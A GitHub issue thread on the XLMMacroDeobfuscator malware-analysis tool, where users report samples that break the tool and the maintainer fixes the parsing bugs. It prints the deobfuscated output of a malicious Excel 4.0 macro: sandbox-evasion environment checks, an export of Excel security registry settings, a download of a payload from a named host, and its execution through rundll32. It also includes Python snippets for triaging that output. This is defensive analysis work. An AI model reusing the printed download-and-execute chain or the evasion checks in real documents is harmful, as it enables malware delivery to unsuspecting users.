DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
Apache License 2.0

Two buggy samples #33

Closed Maijin closed 4 years ago

Maijin commented 4 years ago

I found a couple more samples you may want to check; not sure what the best way to get them to you is. They're unrelated to the previous issues, I believe.

One returns an "Error: list index out of range", the other one "F182 is not populated, what should be its value?"

failing,zip.zip

Not sure what the best way to get those samples to you is; not sure if opening issues is it.

DissectMalware commented 4 years ago

I will check these samples shortly. Thanks for sharing.

I think if you can upload them to VT, upload them there and then give me the hashes. Or upload them to any.run or similar sites and give me the links. If none of these works and you want to keep them secret, then upload them to a cloud service like Google Drive and send me the links via DM on Twitter (https://twitter.com/DissectMalware).

doomedraven commented 4 years ago

Or to CAPE so we can test the update too 😉

On Thu., 21 May 2020 21:07, Malwrologist notifications@github.com wrote:

I will check these samples, shortly. Thanks for sharing.

I think if you can upload them on VT, upload them there and then give me the hashes. Or upload them on any.run or similar sites and give me the links.


Maijin commented 4 years ago

Oh, it's not about keeping it secret, hehe, just not sure about creating zillions of issues ;)

DissectMalware commented 4 years ago

I can think of two possible ways: 1. I keep this issue open indefinitely and you post all of the instances that xlmdeobfuscator has a problem with here, or 2. contact me on Twitter (send the hashes through DM, ...)

dryancd commented 4 years ago

I'll take a look at this too

DissectMalware commented 4 years ago

I fixed both of the issues. Please check.

DissectMalware commented 4 years ago

I forgot that I said one option to communicate interesting samples is to keep this issue open indefinitely. I've reopened it so you can choose the option you prefer.

Maijin commented 4 years ago

After update:

7a38e8919652cc138af8d45992dea1792b2e628a363231e80a359efdfd26b8fc is fixed ✅.

The c696f8e0ebb2ce519b343d4dd2770a9e3b0d648defb221275dc249a6ff0ce8f0 one is not fixed:

File: /Users/maijin/Downloads/failing/c696f8e0ebb2ce519b343d4dd2770a9e3b0d648defb221275dc249a6ff0ce8f0

[Loading Cells]
Error: MS Excel is not installed, now xlrd2 library will be used insteads
(Use --no-ms-excel switch if you do not have/want to use MS Excel)
auto_open: auto_open->6CPcWBfqzH!$R$1
[Starting Deobfuscation]
CELL:R1        , FullEvaluation      , FORMULA("=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",6CPcWBfqzH!S1)
CELL:R3        , FullEvaluation      , FORMULA("=IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)",6CPcWBfqzH!S3)
CELL:R4        , FullEvaluation      , FORMULA("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",6CPcWBfqzH!S4)
CELL:R5        , FullEvaluation      , FORMULA("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",6CPcWBfqzH!S5)
CELL:R6        , FullEvaluation      , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))), ,CLOSE(TRUE))",6CPcWBfqzH!S6)

Process Interruption:
CELL:R7        =FORMULA(F1&F3&F4&F5&F6&F7&F9&F10&F11&F12&F13&F14&F15&F16&F18&F19&F20&F21&F22&F23&F24&F25&F27&F28&F29&F30&F31&F32&F33&F35&F36&F37&F38&F39&F40&F42&F43&F44&F45&F46&F47&F48&F50&F51&F52&F53&F54&F56&F57&F58&F59&F60&F61&F62&F63&F65&F66&F67&F68&F69&F70&F72&F73&F74&F75&F76&F77&F78&F79&F80&F81&F83&F84&F85&F86&F87&F88&F89&F91&F92&F93&F94&F95&F96&F98&F99&F100&F101&F102&F104&F105&F106&F107&F108&F109&F110&F112&F113&F114&F115&F117&F118&F119&F120&F121&F122&F123&F124&F125&F127&F128&F129&F130&F131&F132&F133&F134&F135&F136&F137&F138&F139&F140&F141&F142&F143&F144&F145&F146&F147&F148&F149&F150&F151&F152&F153&F154&F155&F156&F157&F158&F159&F160&F161&F162&F163&F164&F165&F166&F167&F168&F169&F170&F171&F172&F173&F174&F175&F176&F177&F178&F179&F180&F181&F182&F183&F184&F185&F186&F187&F188&F189&F190&F191&F192&F193&F194&F195&F196&F197&F198&F199&F200&F201&F202&F203,S7)
Partial Eval: FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\reg.exe"",""EXPORT HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security c:\users\public\1.reg /y"",0,5)",6CPcWBfqzH!S7)
F182 is not populated, what should be its value?
Enter XLM macro:
Tip: CLOSE() or HALT() to exist
DissectMalware commented 4 years ago

Oh, I understand what happens.

We have some cells that have not been set. The interactive shell is popping up because of that. If you use -n you can get the whole output. I forgot to prevent the interactive shell from popping up if a cell has never been set.

With -n you get


          _        _______
|\     /|( \      (       )
( \   / )| (      | () () |
 \ (_) / | |      | || || |
  ) _ (  | |      | |(_)| |
 / ( ) \ | |      | |   | |
( /   \ )| (____/\| )   ( |
|/     \|(_______/|/     \|
   ______   _______  _______  ______   _______           _______  _______  _______ _________ _______  _______
  (  __  \ (  ____ \(  ___  )(  ___ \ (  ____ \|\     /|(  ____ \(  ____ \(  ___  )\__   __/(  ___  )(  ____ )
  | (  \  )| (    \/| (   ) || (   ) )| (    \/| )   ( || (    \/| (    \/| (   ) |   ) (   | (   ) || (    )|
  | |   ) || (__    | |   | || (__/ / | (__    | |   | || (_____ | |      | (___) |   | |   | |   | || (____)|
  | |   | ||  __)   | |   | ||  __ (  |  __)   | |   | |(_____  )| |      |  ___  |   | |   | |   | ||     __)
  | |   ) || (      | |   | || (  \ \ | (      | |   | |      ) || |      | (   ) |   | |   | |   | || (\ (
  | (__/  )| (____/\| (___) || )___) )| )      | (___) |/\____) || (____/\| )   ( |   | |   | (___) || ) \ \__
  (______/ (_______/(_______)|/ \___/ |/       (_______)\_______)(_______/|/     \|   )_(   (_______)|/   \__/

XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: C:\Users\user\Downloads\failing.zip\failing\c696f8e0ebb2ce519b343d4dd2770a9e3b0d648defb221275dc249a6ff0ce8f0

[Loading Cells]
Error: MS Excel is not installed, now xlrd2 library will be used insteads
(Use --no-ms-excel switch if you do not have/want to use MS Excel)
auto_open: auto_open->6CPcWBfqzH!$R$1
[Starting Deobfuscation]
CELL:R1        , FullEvaluation      , FORMULA("=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",6CPcWBfqzH!S1)
CELL:R3        , FullEvaluation      , FORMULA("=IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)",6CPcWBfqzH!S3)
CELL:R4        , FullEvaluation      , FORMULA("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",6CPcWBfqzH!S4)
CELL:R5        , FullEvaluation      , FORMULA("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",6CPcWBfqzH!S5)
CELL:R6        , FullEvaluation      , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))), ,CLOSE(TRUE))",6CPcWBfqzH!S6)
CELL:R7        , FullEvaluation      , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\reg.exe"",""EXPORT HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security c:\users\public\1.reg /y"",0,5)",6CPcWBfqzH!S7)
CELL:R9        , FullEvaluation      , FORMULA("=WAIT(NOW()+""00:00:03"")",6CPcWBfqzH!S9)
CELL:R10       , FullEvaluation      , FORMULA("=FOPEN(""c:\users\public\1.reg"")",6CPcWBfqzH!S10)
CELL:R11       , FullEvaluation      , FORMULA("=FPOS(R[-1]C, 215)",6CPcWBfqzH!S11)
CELL:R12       , FullEvaluation      , FORMULA("=FREAD(R[-2]C, 255)",6CPcWBfqzH!S12)
CELL:R13       , FullEvaluation      , FORMULA("=FCLOSE(R[-3]C)",6CPcWBfqzH!S13)
CELL:R14       , FullEvaluation      , FORMULA("=FILE.DELETE(""c:\users\public\1.reg"")",6CPcWBfqzH!S14)
CELL:R15       , FullEvaluation      , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-3]C)),CLOSE(FALSE),)",6CPcWBfqzH!S15)
CELL:R16       , FullEvaluation      , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""https://amgdorie.online/avdv43g"",""c:\Users\Public\bug75ef.html"",0,0)",6CPcWBfqzH!S16)
CELL:R18       , FullEvaluation      , FORMULA("=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."",2)",6CPcWBfqzH!S18)
CELL:R19       , FullEvaluation      , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\rundll32.exe"",""c:\Users\Public\bug75ef.html,DllRegisterServer"",0,5)",6CPcWBfqzH!S19)
CELL:R20       , FullEvaluation      , FORMULA("=CLOSE(FALSE)",6CPcWBfqzH!S20)
CELL:R21       , NotImplemented      , WORKBOOK.HIDE("6CPcWBfqzH",TRUE)
CELL:R22       , FullEvaluation      , GOTO(S1)
CELL:S1        , FullBranching       , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
CELL:S1        , End                 , [TRUE] CLOSE(FALSE)
CELL:S1        , FullEvaluation      , [FALSE]
CELL:S3        , FullBranching       ,  IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),)
CELL:S3        , End                 ,  [TRUE] CLOSE(FALSE)
CELL:S3        , FullEvaluation      ,  [FALSE]
CELL:S4        , FullEvaluation      ,      IF(GET.WORKSPACE(19),,CLOSE(TRUE))
CELL:S5        , FullEvaluation      ,          IF(GET.WORKSPACE(42),,CLOSE(TRUE))
CELL:S6        , FullEvaluation      ,              IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
CELL:S7        , FullEvaluation      ,                  CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security c:\users\public\1.reg /y,0,5)
CELL:S9        , PartialEvaluation   ,                  WAIT(NOW()+"00:00:03")
CELL:S10       , PartialEvaluation   ,                  FOPEN("c:\users\public\1.reg")
CELL:S11       , PartialEvaluation   ,                  FPOS("c:\users\public\1.reg",215)
CELL:S12       , PartialEvaluation   ,                  FREAD("c:\users\public\1.reg",255)
CELL:S13       , PartialEvaluation   ,                  FCLOSE("c:\users\public\1.reg")
CELL:S14       , NotImplemented      ,                  FILE.DELETE("c:\users\public\1.reg")
CELL:S15       , FullEvaluation      ,                  IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
CELL:S16       , FullEvaluation      ,                      CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://amgdorie.online/avdv43g","c:\Users\Public\bug75ef.html",0,0)
CELL:S18       , PartialEvaluation   ,                      ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
CELL:S19       , FullEvaluation      ,                      CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\bug75ef.html,DllRegisterServer",0,5)
CELL:S20       , End                 ,                      CLOSE(FALSE)
[END of Deobfuscation]
time elapsed: 0.4545588493347168
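The -n output above is exactly the kind of text an analyst ends up grepping through by hand: which GET.WORKSPACE() values the macro fingerprints, which native exports it reaches via CALL(), where it downloads from, and which cells the emulator could not fully resolve. The helper below is an added example and is not part of XLMMacroDeobfuscator; it parses the `CELL:<ref> , <status> , <formula>` line format the tool prints and works over a constructed excerpt of the output quoted in this thread. The GET.WORKSPACE() argument meanings are taken from the Excel 4.0 macro function reference.

```python
"""Triage xlmdeobfuscator output for the behaviours an analyst cares about.

Added example; it is not part of XLMMacroDeobfuscator. The input is a
constructed excerpt of the -n output shown above, and the line format
(CELL:<ref> , <status> , <formula>) is the one that output uses.
"""
import re

# GET.WORKSPACE() argument numbers this sample uses to fingerprint the host.
# Meanings per the Excel 4.0 macro function reference; 2 (Excel version) is
# deliberately excluded because the macro only uses it to build a registry
# path, not as an environment check.
WORKSPACE_CHECKS = {
    1: "environment name (OS)",
    13: "usable workspace width",
    14: "usable workspace height",
    19: "mouse present",
    42: "sound capable",
}

CELL_RE = re.compile(r"^CELL:(\S+)\s*,\s*(\w+)\s*,\s*(.*)$")
WORKSPACE_RE = re.compile(r"GET\.WORKSPACE\((\d+)\)")
CALL_RE = re.compile(r'CALL\("([^"]+)","([^"]+)"')   # CALL("dll","export",...
URL_RE = re.compile(r"""https?://[^\s"',)]+""")

# Constructed excerpt of the deobfuscator output quoted in this thread.
SAMPLE_OUTPUT = r"""
CELL:S1        , FullBranching       , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
CELL:S4        , FullEvaluation      ,      IF(GET.WORKSPACE(19),,CLOSE(TRUE))
CELL:S7        , FullEvaluation      ,                  CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security c:\users\public\1.reg /y,0,5)
CELL:S14       , NotImplemented      ,                  FILE.DELETE("c:\users\public\1.reg")
CELL:S16       , FullEvaluation      ,                      CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://amgdorie.online/avdv43g","c:\Users\Public\bug75ef.html",0,0)
CELL:S19       , FullEvaluation      ,                      CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\bug75ef.html,DllRegisterServer",0,5)
[END of Deobfuscation]
"""


def triage(output: str) -> dict:
    """Return host-fingerprinting checks, native calls, URLs and the cells the
    tool could not fully resolve (those still need manual review)."""
    findings = {"sandbox_checks": [], "native_calls": [], "urls": [], "unresolved": []}
    for line in output.splitlines():
        m = CELL_RE.match(line)
        if not m:
            continue  # banner, [Loading Cells], timing and other non-cell lines
        cell, status, formula = m.group(1), m.group(2), m.group(3).strip()
        for arg in WORKSPACE_RE.findall(formula):
            n = int(arg)
            if n in WORKSPACE_CHECKS:
                findings["sandbox_checks"].append((cell, n, WORKSPACE_CHECKS[n]))
        for dll, export in CALL_RE.findall(formula):
            findings["native_calls"].append((cell, dll, export))
        findings["urls"].extend(URL_RE.findall(formula))
        if status in ("NotImplemented", "PartialEvaluation"):
            findings["unresolved"].append((cell, status))
    return findings


if __name__ == "__main__":
    for key, items in triage(SAMPLE_OUTPUT).items():
        print(key)
        for item in items:
            print("   ", item)
```

Feed it the full -n output (`xlmdeobfuscator -f sample -n > out.txt`) and the `unresolved` list tells you which cells to look at by hand, for example the FILE.DELETE() and WAIT()/FOPEN() cells here, while `sandbox_checks` explains why the sample may do nothing in an automated environment with a small screen, no mouse or no sound device.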
DissectMalware commented 4 years ago

The interactive mode is also fixed.

If we encounter a cell that is missing, there are two possibilities: 1. we failed to evaluate a macro previously, and as such we couldn't set the cell; 2. the cell has never been set before and is empty.

In the first case, start the interactive shell; otherwise, return an empty string.
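The rule in the comment above only works if the emulator records a failed evaluation rather than leaving the cell absent; otherwise the two cases look identical at read time. The sketch below is an added example, not code from XLMMacroDeobfuscator: the `Sheet` store, the `EvalFailed` marker, the `fake_shell` callback and the cell contents are all constructed for illustration. A never-set cell reads as "" (which is also what Excel's `&` operator yields for an empty cell), while a cell whose formula could not be evaluated earlier hands the decision to the analyst.

```python
"""Two kinds of 'missing cell' during XLM emulation.

Added example; not code from XLMMacroDeobfuscator. Cell store, EvalFailed
marker and callback names are assumptions chosen to illustrate the rule:
never populated -> empty string; evaluation failed earlier -> ask the analyst.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Tuple


@dataclass
class EvalFailed:
    """Marker stored in a cell whose formula the emulator could not evaluate."""
    formula: str
    reason: str


@dataclass
class Sheet:
    cells: Dict[str, object] = field(default_factory=dict)

    def set(self, ref: str, value) -> None:
        self.cells[ref] = value

    def mark_failed(self, ref: str, formula: str, reason: str) -> None:
        # Record the failure instead of leaving the cell absent, so a later
        # read can tell "evaluation failed" apart from "never populated".
        self.cells[ref] = EvalFailed(formula, reason)

    def read(self, ref: str, ask: Callable[[str, EvalFailed], str]) -> str:
        if ref not in self.cells:
            return ""                     # case 2: never set, empty string
        value = self.cells[ref]
        if isinstance(value, EvalFailed):
            return ask(ref, value)        # case 1: defer to the interactive shell
        return str(value)


def concat(sheet: Sheet, refs: List[str], ask) -> str:
    """Emulate F1&F3&...: string concatenation of cell references."""
    return "".join(sheet.read(r, ask) for r in refs)


def demo() -> Tuple[str, List[str]]:
    """Constructed scenario: F1 and F3 hold fragments, F182 was never written,
    F5 holds a (made-up) formula the emulator could not evaluate."""
    sheet = Sheet()
    sheet.set("F1", "=CA")
    sheet.set("F3", "LL(")
    sheet.mark_failed("F5", "=CHAR(GET.WORKSPACE(99))", "unsupported GET.WORKSPACE argument")

    prompts: List[str] = []

    def fake_shell(ref: str, failure: EvalFailed) -> str:
        # Stand-in for the interactive prompt; an analyst would type a value here.
        prompts.append(f"{ref} not populated ({failure.reason})")
        return "<manual>"

    silent = concat(sheet, ["F1", "F182", "F3"], fake_shell)    # no prompt
    prompted = concat(sheet, ["F1", "F5", "F3"], fake_shell)    # one prompt
    return silent + "|" + prompted, prompts


if __name__ == "__main__":
    result, prompts = demo()
    print(result)
    print(prompts)
```

With the F182-style gap the concatenation completes silently; only the cell that was marked as failed triggers the prompt, which is the behaviour the fix above describes.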

Maijin commented 4 years ago

Awesome!